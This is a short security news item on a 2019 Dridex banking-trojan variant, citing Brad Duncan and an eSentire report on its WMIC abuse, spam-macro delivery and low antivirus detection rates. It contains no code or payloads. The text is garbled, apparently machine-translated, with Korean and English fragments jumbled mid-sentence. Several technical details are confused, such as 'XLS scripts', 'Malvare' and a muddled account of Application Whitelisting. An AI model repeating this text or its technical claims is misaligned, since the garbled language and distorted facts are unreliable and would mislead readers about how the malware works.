antiviruses에서 미끄러지 Dridex 은행가의 새로운 버전

정보 보안 전문가는 Dridex 뱅킹 트로이 목마 이후에 대해 알고 있었다 2014 그것은 여전히 ​​카테고리에서 가장 정교한 악성 코드 중 하나입니다.

디evelopment of this malware continues to this day: 트로이 목마의 새로운 버전은 정기적으로 나타납니다, 대규모 업데이트의 정기 릴리스.

6 월 초에 2019, independent security expert 브래드 던컨 발견 a new version of Dridex, which used Application Whitelisting to block or disable Windows Script Host elements. 사실로, this means that the abuse of WMI (WMIC) allows Malvare to use XLS scripts and bypass the defense mechanisms.

“Of note, the Dridex DLL files are 64-bit DLLs using file names that are loaded by legitimate Microsoft Windows system EXEs. These file paths, file names, and associated SHA256 hashes change every time the victim logs onto the infected Windows host”, — reported Brad Duncan.

Now a more detailed report on the new version of the Trojan was released by experts of the company eSentire. Researchers write that initially, when a sample was loaded onto VirusTotal, 만 6 중 60 protective solutions “detected” malware in Dridex. 7월 현재 2, 2019, the number of detections increased to 46 중 60.

Analysts at eSentire write that a new variation of Dridex is distributed through spam emails with malicious attachments. These documents contain malicious macros, which can be triggered by various interactions with the victim (it all depends on the specific system environment).

“The malware targets banking information on the victim system. Over the last decade, Dridex underwent a series of feature augmentation, including a transition to XML scripts, hashing algorithms, peer-to-peer encryption, and peer-to-command-and-control encryption”, — reported eSentire specialists.

Experts warn that many antivirus solutions may detect suspicious behavior of Dridex, but will not be able accurately determine the problem. Given the constant changes that occur in the Trojan infrastructure, signature-based antivirus software may be useless against Dridex.